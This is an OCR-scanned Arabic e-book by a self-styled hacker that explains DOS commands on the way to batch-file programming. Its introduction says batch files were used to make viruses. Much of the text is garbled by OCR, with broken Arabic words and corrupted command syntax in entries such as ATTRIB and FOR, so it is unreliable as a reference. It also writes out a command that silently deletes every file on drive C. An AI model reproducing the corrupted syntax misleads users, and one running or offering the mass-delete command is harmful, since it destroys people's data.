^HaCkEr BoY^ رlكڊ سامر بكار‎ 


المؤلف: سامر بكار بكار. 
للاتصال: 
http://www.hacker-boy.150m.com‏ 
http://samerbb.jeeran.com‏ 
MSN Messenger : Samer_b_b@hotmail.com‏ 
Yahoo Pager : Samer _ b_b@yahoo.com‏ 
Phone: +96392338686‏ 
ملاحظة: إذا قمت بإرسال رسالة فضع كلمة "كتاب دوس" كعنوان للرسالةء ثم ضع ما تريد داخلها. 
إن حقوق كتاب "كتاب دوس وصولا لبرمجة الملفات الدفعية" محفوظة للمؤلف» ولا يحق لأي شخص كان 


طباعته أو نشره دون إذن خطي من المؤلف تحت طائلة الملاحقة القانونيةء لكن يسمح بنشره في أي موقع بعد 
إرسال رسالة إلى المؤلف تخبره بذلك. 


كتاب دوس .. وصو لا لبرمجة الملفات llأعıة ^HaCkEr_BoY^‏ 


NIY 


أهدي هذا الكتاب إلى أغلى مخلوقين في هذه الدنيا على قلبي» من علماني 
هر ور له و ل کان ت هة ااي ا ما 
أنا عليه» من كانا سبب وجودي.. أبي و أمي» وأهدي ما صنعت إلى أطيب 
أغقي, انتا استاي الى لوان أك أي لر لاه لم اتلم حرف جريا أو 
سطرا حاسوبياء أطمخ البشر في الدنياء وأجذهم.. أخي الكبير موفق»ء كما 
أهديه أيضا إلى كل من الشيوخ» أحمد بكار» وحمزة الشمالي» وفراس 
القاسم» لأنهم أشخاص لا يوفر لي غيرهم الطمأئينة و النصيحة التي أكون 
متأكدا من جدواها بمجرد مماعهاء وأهدي هذا العمل المتر اشع إلى أغز 
أصدقائي.. محمود بكار» و طاهر بكار» و عبد الرحمن الشمالي» وحمزة 
بكار» فمن السهل أن تجد ألف صديق» ولكن من الصعب أن تجد صديقا 


واک سرا متي ادا 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعيةڈ ^HaCkEr_ BoY^‏ 


المقدمة: 


بسم الله الرحمن الرحيم» والصلاة و السلام على سيد المرسلين محمد (صلى الله عليه و سلم)» وعلى أصحابه 
أجمعين» وعلى آل بيته الطيبين الطاهرين. 


اللهم لا علم لنا إلا ما علمتنا إنك أنت العليم الحكيم. 


أًخي القارئ .. ما سأحاول قوله في البدايةء أن هذا الكتاب» ليس الكتاب السحري الذي سيجعلك تتقن ما 
يتحدث عنه من أول قراءة إنما هو كغيره من الكتب» يحتاج إلى التمحيص و التفكر» ليس بمادته العلميةء إنما 
بربط أفكاره ببعضها وصولاً إلى ما هو جديد» أما نصيحتي فيما يتعلق بهذا الكتاب» أن تقراً الكتاب للمرة الأولىء 
قراءة و فهماء بالإضافة إلى حفظ ما ترى أنه يجب أن يُحفظ أي الأوامر» و نتائجهاء وطريقة كتابتهاء و لا تقلق 
إن شعرت أنك لا تستوعب» فهو شعور يصيب الغالبيةء أكمل قراءة الكتاب» و ابدأً بقراءته مرة أخرىء»ء ستجد أن 
لديك القدرة على فهم كل كلمة منه. 


۷ لمن هذا الكتاب؟ 


إن هذا الكتاب موجه إلى كافة الفثات من المتعلمين» مبتدئين» متوسطين»ء وحتى المحترفين؛ إن ما يجعلني 
متأكدأً من فاعليته لدى المحترفين أني حاولت وضع أغلب أوامر نظام التشغيل دوس» وإن أغفلت شيئاء فإنما فعلت 
ذلك لأن الأمر غير هام» أو ليس له أي إفادةء فإن تعلمت و حفظت ما هو موجود في هذا الكتيب المتواضعء 
ستكون قد أضفت لغة جديدة من لغات البرمجة إلى خزانتك العلميةء بالإضافة إلى تعلمك نظام التشغيل 508. 


۷م هو دوس؟ 


إن دوس عبارة عن نافذة سوداء» ليس فيها ما يتحرك سوى المؤشر الذي يشير إلى مكان الكتابةء ندخل له 
الأوامر بشكل مكتوب» ويعود هو لنا بالنتائج بشكل مكتوب أيضاء يفيدنا دوس في التعامل مع الحاسوب مثل 
وندوس تماماء ولن يستطيع أي مستخدم الاستغناء عنه خصوصا إذا اراد عمل ھ٣٥۴‏ أو kونف۴‏ للها رد 
ديسك» لكن فائدته القصوى التي دفعتني لكتابة و شرح أوامره هناء هي التي سنجنيها عند كتابة الملفات الدفعية. 


۷ ما هى الملفات الدفعية؟ 
هي ملفات تنفيذية لاحقتها اط. › تقوم بتنفيذ مجموعة من الأوامر (وهي المكتوبة داخلها)» عند تشغيلهاء و 


الأوامر التي تكتب داخل الملفات الدفعية هي أوامر نظام دوس ذاتهاء إلا أن هناك مجموعة من الأوامر الخاصة 
بالملفات الدفعية والتي لا تستخدم خارجها. 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


۷ ما الذي يدفعني لتعلم هذه الأمور الكلاسيكية؟ 
سأجيب عن هذا السؤال بذكر الأمور التي دفعتني أنا لتعلمها.. 
أولا الفيروسات.. 


فمن خلال تعلم الملفات الدفعيةء تمكنت من صناعة فيروسات جميلةء سأذكر بعضاً منها في هذا الكتاب» ومن 
روائع الملفات الدفعية أنها قابلة للتحويل إلى صيغة ملف تنفيذي 8×٤‏ » وذلك يجعها تبدو تماما كالفيروسات 
المصنوعة بلغة € أو ++). أو غيرها من لغات البرمجة العالية المستوى. 


ثانياً البرمجة بلغات أخرى.. 


لقد ساعدتني الملفات الدفعية أثناء برمجتي في فيجيوال بيسيك على التخلي عن العديد من سطور ال۸۴1 
Î (Application Programming Interface)‏ واجهة برمجة التطبيقات» والتي تعتمد على استدعاء وظائف 


من نظام التشغيل س هلد والفرق واضح بينهماء فستكلفني برمجة ملف يحضر اسم مستخدم الحاسب كلمتين 
(هذا في الملفات الدفعية)ء أما في ال۴1 فستكلف العملية السابقة أكثر من 30 كلمة للوصول إلى نفس النتيجة. 


ثالثا صناعة ملفات خدذمية خاصة: 


في إحدى المرات تعرضت لفايرس يقضي على الاختصارات» ويكل بساطةء تجاهلت الفايرس»ء وصنعت ملفا 
دفعياً يعيد لي الخدمة رغماً عن أنفه» هذا بالإضافة إلى الملفات الأخرى مثل برنامج صغير يقوم بإفراغ مجلد 
TEMP‏ و مجlد "EMPORARY INTERNET FILES‏ و مجلد RE118‏ بضغطة زر . 


مفاد كلامي أننا من المستحيل أن نستغني عن أي شئ حتى ولو كان قديما بعض الشئ (أقصد المعلومات). 
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كتاب دوس .. وصو لا لبرمجة الملفات llأعıة ^HaCkEr_BoY^‏ 


»« +« 


م دوس 
DOS‏ 


أوامر نظام التشغيل دوس: 


أريد قبل البدء أن أنوه إلى أن كل أمر له الكثير من الخيارات الفرعية (الأفضليات)ء و نحن لسنا مقيدون بهاء 
إنما يمكننا أن نضع ما نحن بحاجة إليه دون أن نلتزم بوضع البقيةء لأن للبقية حالة افتراضية سيتبعها ويندوز 
تلقائياً؛ لنبحر الآن في أوامر نظام التشغيل دوس.. 


¥ ASSOS: 
يعرض أنواع الملفات في النظام» كما يتيح إمكانية تعديلهاء أو تعريف نوع جديد؛ يمكن كتابة الأمر دون كتابة‎ 
: شئ بعده لعرض أنواع الملفات و مشغلاتهاء وسيعطي نتائج كالتالي‎ 
.aifAIFFFile 
.aifc=AIFFFile 
.aiffEAIFFFile 
.ais=ACDSee.ais 
.ani=ACDSee.ani 
.api=AcroExch.Plugin 
.arj=WinRAR 


.mdz=Access.Database Wizard Template.10 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


.mgc=MediaCatalogMGC 
.mid=midfile 
.midi=midfile 
.mml=MediaCatalogMML 
.mmm=MPlayer 


.mmw=MediaCatalo gMM W 


و هو يدل بذلك على أنواع الملفات بالإضافة إلى المشغلات (برامج التشغيل)» فمثلاًء كل الملفات ذات اللاحقة 
ہصصص. یتم تشغیلھا بو اسطة برنامج MP]ayer‏ 


ويمكن معرفة برنامج تشغيل أي نوع من الملفات بكتابة الأمر: 
ASSOC .mmm‏ 


و نضع بدل صصص نوع الملفات الذي تريد معرفة برنامج تشغيلهء وإذا أردنا تغيير أي نوع» يكون الأمر 
کالتالی: 


مثلا نرید تغییر نوع ۳ . مj Samer ylإ MPlayer‏ .. 

ASSOC .mmm=Samer 
.صص١=؟S2 ستظهر لدينا النتيجة التالية: ۲م‎ ۸890٤٥ الآن إذا كتبنا الأمر صصصط.‎ 
تعريف نوع جديد من الملفات» ويكون شكل الأمر كالتالي:‎ ۸850٥ ويمكن بواسطة الأمر‎ 


ASSOC .saz=SazProg 


و بذلك نكون قد عرفنا كل الملفات ذات اللاحقة zهء.‏ على أنها تابعة للبرنامج (أو يتم تشغيلها بواسطة 
البرliمج‏ ( SazProg‏ 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعيةڈ ^HaCkEr_ BoY^‏ 


y AT: 


و يحتوي على مجموعة من جداول الأعمال و البرامج التي ستعمل على الكومبيوتر في أوقات و تواريخ 
محددة» و يمكن استعراض جدول الأعمال بكتابة الأمر التالي: 


AT 

أما إن أردنا كتابة مهمة جديدة فيكون العمل على الصيغة التالية: 
AT [\\computername|] [ [id] /DELETE] | /DELETE [/YES]]‏ 
AT [\computername] time [/INTERACTIVE]‏ 


[ /EVERY:date[,...] | /NEXT:date|[,...]] "command" 


me‏ putern2صmدC‏ هو اسم الكومبيوتر الذي سيتم وضع المهام و المواعيد عليه. 

4 هو رقم الأمر ضمن لائحة الأوامر الموجودة. 

E۴1٤‏ يقوم بإلغاء أمر ضمن اللائحةء وإن تم تجاهله سيتم إلغاء و حذف كافة اللائحة. 
858 يستخدم مع أمر إلغاء كافة الأعمال عندما لا تكون هناك حدود أو حواجز. 

م هو الوقت الذي سوف تعمل فيه المهمة. 

/interative‏ يسمح للأمر بالتفاعل مع كافة المستخدمين عند عمله. 

[...]tهل:رامev/‏ وهو أمر لتكرار المهمة في يوم الأحد من كل أسبوع مثلا. 


[... ]2 :× / يقوم بتشغيل المهمة في يوم تالي» متلا إن كانت المهمة يوم السبت» يمكن تشغيلها بعد 
ثلاثة أيام أو عدد الأيام الذي تحدده أنت. 


"command"‏ وهو المهمةء ویمکن ن نضع فیها مسار برنامج» أو ملف دفعي› أو أي أوامر أخرى. 
إن هذه الخيارات يمكن إغفال بعضها لكن الأهم هو اسم الكومبيوترء و الوقت» و المهمة. 


مثلا: الأمر التالي سيقوم بتشغيل المفكرة تمام الساعة الثانية ظهرا من اليوم الذي أدخلت فيه 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


AT \\jessica 14:00 notepad.exe 


¥ ATTRIB: 
يقوم بعرض» وتعديل خصائص الملفات» مثل خاصية 'مخفي" أو للقراءة فقط"...‎ 
لعرض آخر التعديلات على خصائص الملفات بالإضافة إلى الملفات التي تم تعديل خصائصها نكتب التالي:‎ 
ATTRIB 
أما لتعديل خصائص ملف» فنقوم بإتباع الصيغة التالية:‎ 
ATTRIB [FR | -R|] [FA | -A | [+S | -S| [+H | -H] [drive:][path][filename] 


[/S [/D]] 


8٩‏ هو الأمر الأساسي الذي سنعمل به. 

+ أو - تستخدم لإضافة أو إزالة خاصية ما إلى و من الملف. 
۸R‏ اختصار ل را”ه-لهع۸ أي للقراءة فقط. 

Archive —فÛ رlصتخا A‏ أي ملف أرشيف. 

8 اختصار ل ١ء‏ ءر؟ أي ملف نظام. 

8 اختصار ل ١ء114‏ أي مخفي. 

filename [‏ ][athمdrive:[]P]‏ وهي مکان وجود الملف. 


5 و يستخدم عندما نريد تنفيذ الأمر (أي تعديل الخصائص) ليس على ملف فقطء إنما على كافة الملفات 
الموجودة في كافة المجلدات في المسار الذي نحدده. 


/ نفس عمل السابقةء لكن تختلف عن سابقتها في طريقة إظهار النتائج. 
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كتاب دوس .. وصو لا لبرمجة الملفات الدفعية ^HaCkEr BoY^‏ 


مثال: لتغيير خاصية الملف المسمى ١×ء٠.w»‏ الموجود على السواقة 1:١‏ إلى ملف مخفي نكتب: 
Attrib +h d:\ww.exe‏ 
و لإظهار (أي إزالة خاصية مخفي عنه)ء نكتب: 
Attrib —h d:\ww.exe‏ 
و هكذا نستخدم الخصائص الأخرى. 
y BREAK:‏ 


أمر يستخدم عند كتابة الملفات الدفعية» ووظيفته إما السماح أو عدم السماح بإيقاف الملف الدفعي عن العمل 
عندما يبدأء حيث يمكن إيقاف عمل الملف الدفعي بضغط الزرين € + ٣1‏ معا. 


لمنع الإيقاف نكتب الأمر : 
BREAK OFF‏ 
و للسماح به نكتب: 
BREAK ON‏ 


yJ CACLS: 


و يستخدم لعرض و تعديل صلاحيات المرور (الوصول)» وذلك فيما يتعلق بالسواقات أو الملفات»ء لكن هذا 
الأمر لا يعمل إلا مع الأقراص كإ1۷إ ذات نظام الملفات )N1۴8‏ التي تعمل عليها أنظمة ۲× Windows‏ 


لعرض هذه الصلاحيات نكتب: 
CACLS c:\‏ 
و سيعطينا النتيجة التالية: 
c:\ BUILTIN\Administrators:(OI1)(CD)F‏ 
NT AUTHORITY\SYSTEM:(OI)(CI)F‏ 


CREATOR OWNER:(OI)(CI(IO)F 


BUILTIN\Users:(OD(CDR 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr _ BoY^‏ 


BUILTIN\Users:(CI)(special access:) 


FILE APPEND DATA 


BUILTIN\Users:(CI)([O)(special access:) 


FILE WRITE DATA 


Everyone:R 


شرح هذه النتيجة موجود في التالي» لتعديل خاصية أو أكثر من خصائص الوصول» نستخدم الصيغة التالية: 


CACLS filename [/T] [/E|] [/C] [/G user:perm] [/R user [...]] 
[/P user:perm [...]] /D user [...]] 


58 وهو الأمر الذي سنعمل به. 
٥ص۴116‏ وهو اسم الملف» هذا إذا كنا نتعامل مع ملف فقط (أي ليس مع سواقة كاملة). 


آ/ هذا إذا أردنا تطبيق مجموعة الخصائص الجديدة على كافة الملفات الموجودة في نفس السواقة وفي 
المجلدات الأخرى الفرعية. 


/٤‏ تعديل قائمة مهام الوصول بدلا من استبدالها. 

/ التكملة عند وجود أخطاء منع الوصول. 

ue:‏ 6/ وهو لمنح احد المستخدمين صلاحيات وحقوق جديدة» وهو إما أن يكون: 
۸ اختصار ل لهءR‏ أي قراءة. 
۷ اختصار ل ما أي كتابة. 
٤‏ اختصار ل عع«هطC‏ أي تعديل أو تغيير. 


۴ اختصار ل 1٥۲٤ء‏ ۴11 أي صلاحيات كاملة. 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr BoY^‏ 


۲ ۸/ وهو لسحب أو إلغاء بعض أو كل صلاحيات أحد المستخدمين. 


۲ا ۶/ تبديل صلاحيات و حقوق الأعضاء» ويمكن أن يأخذ نفس قيم 6/ 


۳۲ (/ منع صلاحيات وصول المستخدم. 
هناك طرق لتخصيص الصلاحيات لأكثر من ملف» كما يمكن تخصيص صلاحيات أكثر من مستخدم. 


1 سيتم توريث الصلاحيات إلى المجلدات الأخرى» 01 لتوريث الصلاحيات للملفات الأخرى» 10 توريث 


¥ CALL: 
: آم تكم فى لفات فة ر يكن فن الاسل ملت دق آخرء ریسم اتی‎ 
CALL c:\autoexec.bat 
yy CD: 
يستخدم أثناء التنقل بين المجلدات» وله عدة أشكال» أهمها:‎ 
CD 


يستخدم لعرض الموقع الحالي. 


CD FolderName 


للدخول إلى lانٹمجند FolderName‏ 


CD.. 


للرجوع إلى الوراء مجلد واحد» أي كما لو ضغطنا زر لأعلى في متصفح ويندوز. 


CD\ 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعيةڈ ^HaCkEr_ BoY^‏ 


للرجوع دفعة واحدة إلى المجلد الرئيسي أي إلى سطح السواقةء فلو كنا في : 
C:\Documents and Settings\SamerBakkar\Desktop>‏ 
و کتبنا ا٣‏ 
سيعود بنا المحث إلى الفهرس: 
C:>‏ 
yY CECP;‏ 


لعرض أو تعديل رقم صفحة الكود النشطء للعرض نكتب الكود دون إضافات» أما إذا أردنا التعديل» فنضيف 
الرقم أو الكود الجديد كالتالي: 


CHCP 321 


y CHKDSK: 


CHKDSK [volume[[path]filename]]] [ZF] [/V] UR] UX] UI] UC] ULI[:size]] 


ما0 هو الحرف الذي يشير للسواقةء أو اسم السواقة. 


٥ط‏ ٥6ا۴‏ یعمل فقط مع نظام الملفات ۴۸1,۴۸732 ویستخدم لتحصیص أو ترتیب الملفات للتأکد من عدم 


۴/ لعرض الأخطاء التي تم إصلاحها. 
۷/ یعمل فقط مع نظام الملفات ۴۸۲,۴۸732› و يعرض المسار الکامل لكل ملف على القرص۔ 


۸/ لعرض رسالة تتضمن الخلايا التالفة في الهارد ديسك أو السواقة التي تم فحصهاء بالإضافة إلى الملفات 
التي تمت استعادتها. 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


¥ CHKNTEFS: 
لعرض أو تعديل خصائص فحص الديسك وقت الإقلاع» للعرض نستخدم الصيغة:‎ 
CHKNTFS c: 
أما للتعديل» فنستخدم:‎ 
CHKNTFS volume [...] 
CHKNTFS /D 
CHKNTFS /T[:time] 


CHKNTFS /X volume [...] 


CHKNTFS /C volume [...] 


ا0 هو حرف السواقة أو اسمها. 


5 يقوم باستعادة الجهاز إلى وشعه الافتراضي» و يشغل فحص الأقر اصن فلقاتيا إن كانت السراقة مشنخة و 
بحاجة لذلك. 


م٣٣‏ / يقوم بتعديل الزمن التنازلي لبدء فحص الأقراص التلقائي إلى زمن مخصص إبالثواني]. 
v0n‏ ×/ يمنع فحص السو اقة التلقائي عند الإقلاع» نلاحظ أن ع ناه اسم السواقة التي نحن بصددها. 
مصuاەv /٤‏ تحديد سواقة لفحصها عند الإقلاع. 

y CLS: 
لتنظيف محتويات الشاشة» لاستعماله نكتب فقط:‎ 


CLS 


¥ CMD: 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعيةڈ ^HaCkEr_ BoY^‏ 


لتشغيل نسخة جديدة من نافذة دوس . 


¥ COLOR: 
لضبط لون الكتابة و لون الخلفية في نافذة دوس» ويستخدم كالتالي:‎ 
COLOR 
لاستعادة الألوان الافتراضية.‎ 
COLOR FB 


تشير ۴ إلى لون الخلفية» و 8 إلى لون الكتابةء و الجدول التالي بین ما یمکن وضعه مکان ۴و 8 : 


¥ COMP: 


يمكن لهذا الأمر أن يقارن بين ملفين أو مجموعة من الملفات» و يحدد الفروق بينهاء مثل أيها أكبر أو أطولء 
الاستخدام كالتالي: 


COMP C:\1stFile.exe f\2ndFile.exe 


و يمكنه أن يتعامل مع أي لاحقة. 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعةڈ ^HaCkEr_ BoY^‏ 


y COMPACT: 


يقوم بضغط السواقات وبالتالي الملفات الموجودة داخلها بهدف توفير مساحة إضافية على القرص» وشكله 
كالتالي: 


COMPACT d:\ww.exe 


y CONVERT: 


يقوم بتغییر نظام الملفات في قرص أو أکثر من ۴۸۲ إلى 1۴8ل لكن لا يمكن تغيير نظام ملفات السواقة 
التي تعمل عليها الآن . 


yY COPY; 
: لنسخ ملف من مكان إلى آخر ويكون شكله كالتالي‎ 
COPY [1stplace] [2ndplace] /y /-y 
لإ/ لنسخ الملفات دوت عرض تأكيد على المستخدم.‎ 
إ-/ لعرض التأكيد.‎ 
الموجود على السواقة © نكتب:‎ ۴٠1٥۲1 من السواقة © إلى المجلد‎ ۷ W.8×٤ مثال» لنسخ الملف‎ 
COPY c:\ww.exe d:\Folder1\ 
y DATE: 


التاريخ الجديد» من الشكل: 


<mm.dd.yy> 


ص هي الأشهر» فإن كنا في الشهر التاني نكتب 02 


هي الأيام 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعة ^HaCkEr_ BoY^‏ 


ر۲ السنين» مثلا 2005 نكتب 05 
DEL:‏ ¥ 
لحذف ملف أو ملفات» ولهذا الأمر الشكل التالي: 


DEL [/P| [/F] [/S] [Q] UVA[[:]attributes]] 


للتنبيه قبل حذف أي ملف. 
۴/ للحذف السريع فيما يتعلق بالملفات ذات الصفة 'للقراءة فقط'. 
5 لحذف كافة الملفات الموجودة في نفس المجلد و في المجلدات الفرعية الموجودة داخله. 
/٩‏ خيار يجعل النظام يحذف الملفات دون تتبيه. 
۸/ لاختيار أنواع معينة من الملفات و يتضمن: 
۸R‏ ملفات القراءة فقط. 
H‏ الملفات المخفية. 
۸ ملفات الأرشيف. 
$ ملفات النظام. 
*فمثلاً: لحذف كافة الملفات في السواقة 0ء دون تنبيه نكتب: 
DEL c:\*.* /S/Q‏ 
أما لحذف كافة الملفات المخفية من السواقة ° مع التنبيه قبل الحذف نكتب: 
DEL c:\*.* /P/S/A:H‏ 
أما لحذف ملف محدد» مثلا الملف W.٤×۴‏ 0 الموجود على السواقة © نكثب: 


DEL c:\ww.exe 
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كتاب دوس .. وصو لا لبرمجة الملفات الدع ^HaCkEr_ BoY^‏ 


y DIR: 


لعرض الملفات و المجلدات الموجودة في الفهرس (المجلد) الذي نحن فيه الآن فقطء نكتب الأمر دون 
إضافات : 


DIR 
أما إن أردنا تخصيص الأمر» فلدينا الصيغة التالية:‎ 
DIR [drive:][path][filename|] [/A[[: ]attributes]] [/B] UC] /D] UL] [N] 


V/O[[:]sortorder]] [/P] [/Q] [/S] UT[[:]Jtimefield]] LW] UX] [/4] 


:ا هي السواقة التي نريد تطبيق الأمر عليها. 
P1‏ إذا اردنا استعراض محتویات مجلد معین. 


4/ لتخصيص العرض» أي عرض ملفات من نوع معين» وإن كتبنا هذا الخيار دون إضافة أي أنواع بعده 
(راجع تفرعات هذا الأمر في الأمر السابق) نكتب ۸/ و سيتم عرض كافة الأنواع. 


8 يقوم بعرض المحتويات دون أي تفاصيل متل الحجم و تاريخ التعديل ... 

/-° لعرض المجلدات و الملفات التي يزيد حجمها عن 1000 كيلو بايت» لإلغاءه (لأنه الافتراضي) نكتب‎ /٤ 
عرض النتائج بشكل أعمدة.‎ /D 

1/ لعرض نتائج بحد أدنى. 

/N‏ لعرض الأسماء الطويلة. 

: لترتيب النتائج بحسب التفرعات التالية: 


5 بخ الحجء 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


N‏ بحسب الاسم. 
( بحسب التاريخ. 
۴/ لعرض النتائج صفحة تلو الأخرى» فسيتوقف كلما عرض صفحة منتظرا ضغط أي مفتاح حتى يكمل. 
/٩‏ لعرض مالك الملفات» أي الشركة المصنعة. 
5 لعرض كافة الملفات و المجلدات حتى في المجلدات الفرعية. 
1/ يتعلق بعرض آخر وقت لتشغيل الملف أو تعديله أو حتى كتابته. 
۷/ لعرض الملفات مصفوفة بشكل عرضاني في الشاشة. 
4/ لعرض السنوات أربع أرقام. 
DISKCOMP:‏ ¥ 
أمر يقوم بمقارنة محتويات قرصين مرنين» وله الشكل: 
DISKCOMP drivel: drive2:‏ 
فمثلا لمقارنة الفرق بين قرصين» الأول في السواقة :۸ و الثاني في :8 » نكتب: 
DISKCOMP A: B:‏ 
DISKCOPY:‏ ¥ 
لنسخ محتويات قرص مرن إلى قرص مرن آخر» ويتبع نفس صيغة الأمر السابق. 
DOSKEY:‏ ¥ 


من أروع أوامر نظام دوس» في الحقيقة أنه ليس له حاجة في نظام ۴× لأن نظام ۴× سيقوم بتنفيذه تلقائياء 
إن هذا الأمر يقوم بحفظ و تخزين كافة الأوامر التي يكتبها المستخدم» حيث يمكن للمستخدم أن يسترجع أي أمر 
كان قد كتبه سابقا (في حدون الجلسة وليس الأيام)ء بواسطة الأسهم في لوحة المفاتيح» ففي السابق (منذ عشرة 
سنوات أو أكثر) كان نظام دوس (دوس الحقيقي و ليس الموجود داخل وندوس) منتشرا انتشارا واسعا بين 
المستخدمين» وكان على المستخدم أن يكتب الأوامر التي يحتاجها للتعامل مع جهازه» وهذا أمر ممل إذا كانت 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعيةڈ ^HaCkEr_ BoY^‏ 


هناك أسطر طويلة يجب على المستخدم إعادتهاء لذلك كان الأمر رإع)وهل فائدة خاصة» والآن لنعد لموضوعنا و 


نرى تفرعات هذا الأمرء إن هذا الأمر له تفرعات كثيرة سأقوم بعرض أهمهاء وهي: 


DOSKEY /HISTORY 
لعرض الأوامر التي تم تخزينها.‎ 
DOSKEY /REINSTALL 
لتشغيل نسخة جديدة» أي مسح محتويات نسخة.‎ 
و هناك تفرعات أخرى لا أجد أن المستخدم بحاجة إليها و الوقت الحالي.‎ 
y ECHO: 


من أوامر الملفات الدفعيةء وظيفته الرئيسية هي عرض المسار أو إخفاءه» و أقصد بعرض المسار أي ما يكتبه 
ويندوز بشكل تلقائي عند تشغيل نافذة الدوس مثل: 


C:\Documents and Settings\HackerBoy\Desktop> 
يكون الأمر كالتالي:‎ E٤۳80 فإذا أردنا إيقاف عرض المسار بواسطة الأمر‎ 
ECHO OFF 


و النتيجة أن الأوامر سوف تكتب بجانب الحد الأيسر لنافذة الدوس دون أن يكون هناك شئ مكتوب قبلهاء 
حاول كتابة الأمر 0۴۴ ۴)10 لديك و سترى النتيجة» و لإعادة عرض المسارات نكتب الأمر: 


ECHO ON 


و من وظائف هذا الأمر عرض رسائل على المستخدم» فلو اردنا عرض كلمة 1٤110‏ نكتب: 
ECHO HELLO‏ 


سنلاحظ أن کلمة E٥810‏ اختفت و بقیت کلمة .H]٤ 1L0‏ 


يمكن من خلال الأمر 8010 إضافة بعض الكلمات إلى ملف نصنعه يدويأء سأوضح كلامي بمثال مشروح. 
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كتاب دوس .. وصو لا لبرمجة الملفات lالدفعيةڈ ^HaCkEr_ BoY^‏ 
إذا أردنا أن نصنع عن طريق الملق الدفعي ملف نصي مكتوب فيه 4۲))ة8 إمصهS‏ (يمكن أن پڪون ملفا هن آي 
نوع وليس فقط ملف نصي)» فسنفعل ذلك باستخدام الأمر: 
ECHO Samer Bakkar > File.txt‏ 


بواسطة الأمر السابق نكون قد صنعتا ملفاً تنا اسمه File.txt‏ مكتوب Samer Bakkar all‏ أي ستتم 
كتابة كل شئ موجود قبل الرمز < إلى الملف الذي سنحدد اسمه بعد ذلك الرمز. 


الآن إن فتحنا المستند سنجد في داخله جملة: 
Samer Bakkar‏ 


و لإضافة عبارة أو سطر جديد إلى المستند الذي صنعناه قبل قليل بدلا من إشارة < مفردةء نضع واحدة مزدوجة 


أي << بحيث يصبح الأمر كالتالي: 
ECHO Is The Generator Of This Code >> File.txt‏ 
والآن إن عدنا و فتحنا نفس المستند سنجد داخله التالي: 
Samer Bakkar‏ 
Is The Generator Of This Code‏ 
حاول تطبيق المثال السابق و حاول تغيير صيغة الملف الذي سينتج إلى صيغ أخرى (ع٠۲.‏ مثلا). 
ERASE:‏ ¥ 


نفس عمل الأمر (٤1‏ (حذف الملفات)» و هو لا يختلف عنه بأي شيءء و يمكن استخدام نفس الصيغة و 


نفس الأفضليات. 
y EXIT:‏ 
لاغلاق نافذة الدرس: 
y FC:‏ 


لمقارنة ملفين و عرض الفروق بينهماء يتبع الصيغة: 


FC 1stfile.* 2ndfile.* 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


1f.‏ هو الملف الأولء و يمكن كتابة المسار الكامل للملف (هذا إن كانا موجودين في فهرسين مختلفين) 


متل: €×ع. c:|wW Ww‏ 
*.eا۴‏ 2 وهو الملف الثاني . 
y FIND:‏ 
يقوم بالبحث عن نص معين داخل ملف نصي (سلسلة نصية)» ويتبع الصيغة التالية: 


FIND [/V| [/C] UN] [I] "string" [[drive:][path]filename] ...]] 


۴0 هو الأمر الذي سنعمل به. 
۷/ خيار يقوم بعرض كافة الأسطر التي لا تحتوي على كلمة البحث. 
/ خيار يقوم بعرض عدد الأسطر التي تحتوي على كلمة البحث. 
۸ لعرض أرقام الأسطر مع الأسطر التي تحتوي على كلمة البحث. 
1 تجاهل حالة الأحرف» أي ما يقابل بحث غير مطابق في وندوس. 
اء“ هو النص الذي نريد أن نبحث عنه. 
DrivePath\ Filename‏ هو مسار الملف الذي نريد أن نبحث فيه. 
y FINDSTR:‏ 


للبحث عن عدة نصوص في عدة ملفات معا. 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعة ^HaCkEr_ BoY^‏ 


¥ FOR: 


أمر ي يستخدم في الملفات الدفعيةء و يقوم بتنفيذ أمر أو أوامر عند وجود قيمة أو تحقق شرط, لكنه يختلف عن 
الأمر 1۴ الذي سنتحدث عنه لاحقاء وهو يأخذ الصيغة التالية: 


FOR %variable IN (set) DO command [command-parameters] 


ribe‏ وهو المتغير الذي نريد تنفيذ أمر عند مساواته لقيمة معينة. 


(أ6ء) 1N‏ لا يكتب» لكنه يشير إلى أن المتغير يجب أن يعرف في مجموعة المتغيرات لدى وندوس» سأقوم 
بالتفصيل حول هذا الموضوع عند شرح الأمر .S٤1‏ 


0 أمر يعلم و يندوس أن الأوامر سوف تبدأً بعد هذه الكلمة. 


]sئparameter-command] Command‏ هي الأوامر و تفرعاتها و التي سنضعها لكي يتم تنفيذها إذا تحقق 
الشرط. 


إذا أردنا تعریف متغير بأنفسنا - وليس استخدام المتغيرات المعرفة تلقائيا من قبل ويندوز - فيجب أن نضع 
%% قبل المتغير وليس إشارة % مفردة» ويجب أن نلاحظ أن 8 تختلف عن ط أي حالة الحرف كبير أم صغير 
تؤدي إلى اختلاه کی النتيجة. 


مثال: (لا تشغل نفسك به كثيراً لأني سأقوم بتوضیحه فيما بعد) 
FOR %HOMEDRIVE=c: DO copy a:\*.* c:\‏ 
FOR %HOMEDRIVE=d: DO copy a:\*.* d:\‏ 


و معناه أنه إن كانت السواقة الأم هي ٥:‏ فانسخ محتويات السواقة :1 إليهاء وإن لم تكن فلا تفعل شيئاء و 
السطر الثاني يحاول التأكد أن :ل هي السواقة الأم ليؤدي نفس المهمة إن وجدها كذلك. 


Created By Samer Bakkar ^HaCkEr_ BoY^ 22 


كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


¥ FORMAT: 
